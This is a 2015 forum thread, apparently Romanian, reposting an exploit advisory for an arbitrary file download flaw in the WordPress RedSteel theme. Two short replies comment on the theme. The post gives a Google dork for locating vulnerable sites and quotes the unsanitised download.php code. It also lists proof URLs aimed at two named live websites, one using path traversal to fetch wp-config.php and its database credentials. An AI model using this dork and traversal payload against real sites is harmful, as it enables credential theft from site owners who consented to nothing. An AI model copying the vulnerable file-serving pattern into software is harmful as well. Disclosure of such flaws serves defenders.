Aerosol Posted January 28, 2015 Report Share Posted January 28, 2015 |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||-------------------------------------------------------------------------||[*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download Vulnerability||[*] Google Dork: inurl:wp-content/themes/RedSteel||[*] Date : Date: 2015-01-25||[*] Exploit Author: Ashiyane Digital Security Team||[*] Vendor Homepage : http://www.webdesignlessons.com/redsteel-wordpress-theme/||[*] Tested on: Windows 7||[*] Discovered By : ACC3SS||-------------------------------------------------------------------------|||[*] Location :[localhost]/wp-content/themes/RedSteel/download.php?file=filename.php||-------------------------------------------------------------------------|download.php| Vulnerable file : download.php|| Vulnerable code :| <?php$file = @$_GET['file'];$parts = explode('/',$file);$fileName = $parts[sizeof($parts)-1];if ((isset($file))&&(file_exists($file))) { header("Content-type: application/force-download"); header('Content-Disposition: inline; filename="' . $fileName . '"'); header("Content-Transfer-Encoding: Binary"); header("Content-length: ".filesize($file)); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $fileName . '"'); readfile($file);}?>|||||||[*] Proof:||[*]http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php||[*]http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php||[*]|||-------------------------------------------------------------------------||-------------------------------------------------------------------------||-------------------------------------------------------------------------||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|Source Quote Link to comment Share on other sites More sharing options...
gogusan Posted January 28, 2015 Report Share Posted January 28, 2015 cine Doamne o fi cumparat/folosit mizeria asta de tema... Quote Link to comment Share on other sites More sharing options...
Gio33 Posted January 29, 2015 Report Share Posted January 29, 2015 Sunt multe care au fix acelasi fisier de download in ele, probabil copiate una dupa cealalta, nu m-as mira sa fie si special lasat acolo. Quote Link to comment Share on other sites More sharing options...
